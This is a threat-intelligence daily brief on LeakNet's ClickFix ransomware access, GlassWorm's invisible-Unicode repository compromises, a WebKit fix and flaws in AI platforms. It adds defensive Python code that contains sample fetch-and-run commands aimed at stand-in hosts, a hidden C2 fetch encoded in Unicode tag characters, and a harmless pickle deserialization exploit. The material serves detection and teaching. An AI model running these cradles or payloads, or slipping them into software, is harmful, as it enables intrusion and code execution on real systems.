
Cyware Daily Threat Intelligence, March 20, 2026

DTI-Jan19-2225722675

The LeakNet ransomware group has moved away from relying on stolen credentials and is instead using ClickFix social engineering to get victims to infect their own systems. Fake CAPTCHA prompts on compromised websites talk users into executing attacker-supplied commands, which deploy a Deno-based loader that runs in memory.

The GlassWorm campaign has launched a large fifth wave, compromising more than 400 repositories and extensions across GitHub, npm, and VS Code. The threat actor hides malicious logic behind invisible Unicode characters, harvests developer credentials and cryptocurrency wallets, and uses the Solana blockchain for command and control.

Apple has debuted its Background Security Improvements mechanism to deliver a fix for a critical WebKit vulnerability, CVE-2026-20643. This out-of-band patching channel lets Apple bypass the regular OS update cycle and push lightweight fixes directly to core components.

Top Malware Reported in the Last 24 Hours

LeakNet ransomware adopts ClickFix tactics

LeakNet ransomware has added ClickFix to its playbook: a social engineering technique in which a compromised website displays a fake CAPTCHA verification that instructs visitors to paste an attacker-supplied command into the Windows Run dialog and execute it themselves. This is a shift from the group's earlier reliance on stolen credentials and initial access brokers, and it gives the operators faster, broader initial access under their own control. The command stages a Deno-based command-and-control loader (Deno is a JavaScript/TypeScript runtime) that executes payloads directly in memory, leaving little on-disk evidence for file-based detection. Post-compromise activity follows a consistent pattern of lateral movement, data exfiltration and encryption, with legitimate cloud services used to blend the traffic in.
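The following is an added example, not code from the Cyware brief or from LeakNet tooling: a small detector for the ClickFix execution pattern, run over constructed process-creation events in a Sysmon/EDR-like shape. The field names, indicator weights, sample events and .invalid URLs are all this example's own assumptions. The one structural assumption it relies on is that a command pasted into the Windows Run dialog is spawned with explorer.exe as its parent, which is what separates a ClickFix launch from an administrator opening a shell from a terminal or an IDE.

```python
"""Added example (not from the Cyware brief or from LeakNet): ClickFix
detection over Sysmon/EDR-style process-creation events. All field names,
weights and sample events below are assumptions made for illustration."""
import re

RUN_DIALOG_PARENT = "explorer.exe"
# Child images a Run-dialog ClickFix command typically resolves to.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "deno.exe", "curl.exe", "bitsadmin.exe"}

# (label, pattern, weight). Weights are illustrative tuning values.
INDICATORS = [
    ("remote_fetch",    re.compile(r"https?://", re.I), 2),
    ("deno_loader",     re.compile(r"\bdeno(\.exe)?\s+(run|eval|install)\b", re.I), 3),
    ("deno_allow_all",  re.compile(r"\s-A\b|--allow-all\b", re.I), 2),
    ("hidden_window",   re.compile(r"-w(indowstyle)?\s+hidden\b", re.I), 1),
    ("download_cradle", re.compile(r"\b(iwr|iex|curl|bitsadmin|Invoke-WebRequest|"
                                   r"Invoke-Expression|DownloadString)\b", re.I), 1),
    # ClickFix commands often end in a fake "verification" comment so the Run
    # box shows something reassuring while the payload sits off-screen.
    ("captcha_lure",    re.compile(r"\b(verify|captcha|human|robot)\b", re.I), 2),
]

def image_name(path):
    """Basename of an image path, lower-cased, tolerant of either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def score_event(ev):
    """Return (gated, score, reasons). `gated` is True only when the process
    tree matches the Run-dialog shape; without it, command-line matches alone
    are not reported (a developer running `deno run -A` from an IDE should
    not page anyone)."""
    parent = image_name(ev.get("ParentImage", ""))
    child = image_name(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    gated = parent == RUN_DIALOG_PARENT and child in SCRIPT_HOSTS
    score, reasons = 0, []
    if gated:
        score += 2
        reasons.append("script host spawned by explorer.exe")
    for label, rx, weight in INDICATORS:
        if rx.search(cmd):
            score += weight
            reasons.append(label)
    return gated, score, reasons

def detect(events, threshold=5):
    """Events that match the Run-dialog shape and carry enough loader cues."""
    hits = []
    for ev in events:
        gated, score, reasons = score_event(ev)
        if gated and score >= threshold:
            hits.append({"id": ev["id"], "score": score, "reasons": reasons})
    return hits

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"id": "e1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},                       # user opened a shell
    {"id": "e2", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": ("powershell.exe -w hidden -c "
                     "\"iex (iwr 'https://cdn.example.invalid/verify.ps1')\""
                     " # I am not a robot")},                # ClickFix, PowerShell cradle
    {"id": "e3", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c deno run -A https://cdn.example.invalid/loader.ts"},
    {"id": "e4", "ParentImage": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "Image": r"C:\Users\dev\.deno\bin\deno.exe",
     "CommandLine": "deno run -A https://deno.land/x/example/mod.ts"},  # developer, not gated
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The gate on explorer.exe is deliberate: the command-line cues alone are common in developer workflows, and it is the combination of a user-launched script host with a remote fetch that characterises ClickFix. A loader that chains cmd.exe into deno.exe would need parent-chain tracking beyond this single-event check.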

GlassWorm malware targets hundreds of repositories

GlassWorm malware has resurfaced with a coordinated wave affecting more than 400 code repositories and packages across GitHub, npm, and the VS Code and Open VSX extension marketplaces. Researchers counted 433 compromised components this month and attribute the campaign to a single threat actor, because every sample reads its command-and-control instructions from the same Solana blockchain address. First observed last October, GlassWorm hides its malicious code behind "invisible" Unicode characters that render as nothing in an editor or code review, and it targets cryptocurrency wallet data and developer credentials. The latest wave is substantially larger than earlier ones: 200 Python repositories on GitHub, 151 JavaScript/TypeScript repositories, and numerous extensions. The implant polls the Solana blockchain every five seconds for instructions and then runs a JavaScript-based information stealer that collects sensitive developer data; it does not execute on systems with a Russian locale.
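As an added example, not code from the Cyware brief or from the GlassWorm research, here is a scanner for the "invisible" Unicode code points that can hide logic in a source file, together with a decoder for the Unicode Tags block, which is the usual way to smuggle an ASCII payload into text that renders as blank space. The sample source file and its hidden payload are constructed here; the code-point ranges and categories are standard Unicode, while the decision of what to flag is this example's own.

```python
"""Added example (not from the Cyware brief or the GlassWorm research):
find invisible Unicode characters in source text and decode Tags-block
payloads. The sample source and hidden string are constructed."""
import unicodedata

TAGS = range(0xE0000, 0xE0080)           # Tags block; U+E0020..E007E mirror ASCII 0x20..0x7E
VS_SUPPLEMENT = range(0xE0100, 0xE01F0)  # Variation Selectors Supplement (240 invisible values)
VS_BASIC = range(0xFE00, 0xFE10)         # Variation Selectors; VS16 (U+FE0F) is common in emoji
ALLOWED_CONTROLS = {"\t", "\n", "\r"}

def classify(ch):
    """Label a character if it renders as nothing but can still carry data."""
    cp = ord(ch)
    if cp in TAGS:
        return "tag-char"
    if cp in VS_SUPPLEMENT:
        return "variation-selector-supplement"
    if cp in VS_BASIC:
        return "variation-selector"
    cat = unicodedata.category(ch)
    if cat == "Cf":                      # ZWSP, ZWJ, BOM, bidi isolates/overrides, soft hyphen
        return "format"
    if cat == "Cc" and ch not in ALLOWED_CONTROLS:
        return "control"
    if cat in ("Cn", "Co"):              # unassigned / private use
        return cat
    return None

def scan(source):
    """Return (line, column, 'U+XXXX', label) for every suspicious character.
    Splits on '\\n' only, so exotic line separators are reported, not swallowed."""
    findings = []
    for lineno, line in enumerate(source.split("\n"), 1):
        for col, ch in enumerate(line, 1):
            label = classify(ch)
            if label:
                findings.append((lineno, col, f"U+{ord(ch):04X}", label))
    return findings

def decode_tag_payload(source):
    """Map Tags-block characters back to ASCII to read the hidden text."""
    return "".join(chr(ord(ch) - 0xE0000)
                   for ch in source if 0xE0020 <= ord(ch) <= 0xE007E)

# Constructed sample: a zero-width space after one statement and an ASCII
# string encoded into Tags-block characters at the end of another. Both are
# invisible in most editors and diff viewers.
HIDDEN_ASCII = "fetch('https://c2.example.invalid')"
HIDDEN = "".join(chr(0xE0000 + ord(c)) for c in HIDDEN_ASCII)
SAMPLE_SOURCE = (
    "export function activate() {\n"
    "  const key = 'demo';\u200b\n"
    "  return key;" + HIDDEN + "\n"
    "}\n"
)

if __name__ == "__main__":
    for finding in scan(SAMPLE_SOURCE):
        print(finding)
    print("hidden payload:", decode_tag_payload(SAMPLE_SOURCE))
```

Running this in CI over every file in an extension or package before publishing catches the encoding trick regardless of what the decoded payload does; legitimate uses (ZWJ in emoji sequences, VS16, BOM at file start) are rare enough in code that each hit is worth a human look rather than an allowlist.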

Top Vulnerabilities Reported in the Last 24 Hours

Apple addresses WebKit vulnerability in updates

Apple has released Background Security Improvements to address a critical WebKit vulnerability (CVE-2026-20643) affecting iOS, iPadOS, and macOS. Maliciously crafted web content could use the flaw to bypass the same-origin policy; the fix adds input validation. The release debuts a new Apple mechanism for shipping lightweight security patches to components such as Safari and the WebKit framework without waiting for a full OS update, so fixes can arrive more often. Users can manage these updates from the Privacy and Security menu in Settings. It follows Apple's recent patches for several exploited zero-day vulnerabilities.

AI vulnerabilities expose data exfiltration risks

Researchers have disclosed vulnerabilities in Amazon Bedrock, LangSmith, and SGLang that expose sensitive data. Amazon Bedrock's AgentCore Code Interpreter, although designed as an isolated execution environment, allows outbound DNS queries, which an attacker can use to build a command-and-control channel and exfiltrate data over DNS. LangSmith has a high-severity flaw in which URL parameter injection lets an attacker steal user tokens and take over accounts. SGLang has critical vulnerabilities stemming from unsafe pickle deserialization, which can lead to remote code execution when attacker-controlled data is deserialized.
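The following is an added example, not code from the Cyware brief or from the SGLang, LangSmith or Bedrock projects, showing what "unsafe pickle deserialization" means in practice and the standard mitigation. Whoever controls a pickle's bytes controls which callable pickle.loads invokes. The payload here is constructed and deliberately harmless (it evaluates an expression that returns the process ID instead of running a shell command), and the allowlist in the hardened loader is illustrative.

```python
"""Added example (not from the Cyware brief or from SGLang): unsafe
pickle.loads beside a restricted unpickler. Payload and allowlist are
constructed for illustration."""
import io
import os
import pickle

class EvilPayload:
    """Pickle serialises the (callable, args) tuple from __reduce__ and the
    loader calls it. A real payload would return (os.system, ("...",))."""
    def __reduce__(self):
        return (eval, ("__import__('os').getpid()",))

def build_malicious_pickle():
    return pickle.dumps(EvilPayload())

def unsafe_load(data):
    """The vulnerable pattern: untrusted bytes straight into pickle.loads."""
    return pickle.loads(data)

class RestrictedUnpickler(pickle.Unpickler):
    """Hardened pattern: resolve globals only from an explicit allowlist.
    Primitive types (dict, list, str, int, ...) never go through find_class,
    so they still load; everything else, including builtins.eval, is refused."""
    ALLOWED = {("collections", "OrderedDict")}   # illustrative allowlist

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def safe_load(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()

def demonstrate():
    """Run both loaders against the same payload; returns plain booleans."""
    payload = build_malicious_pickle()
    result = {}
    # The attacker's expression runs inside the loader's process.
    result["unsafe_ran_attacker_code"] = unsafe_load(payload) == os.getpid()
    try:
        safe_load(payload)
        result["safe_blocked"] = False
    except pickle.UnpicklingError:
        result["safe_blocked"] = True
    benign = {"model": "demo", "weights": [0.1, 0.2, 0.3]}
    result["safe_roundtrip"] = safe_load(pickle.dumps(benign)) == benign
    return result

if __name__ == "__main__":
    print(demonstrate())
```

A restricted unpickler is the fallback when pickle cannot be removed; the stronger fix for model-serving code is not to accept pickle from untrusted sources at all and to use a data-only format (JSON, or safetensors for tensors) whose parser has no code-execution path.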
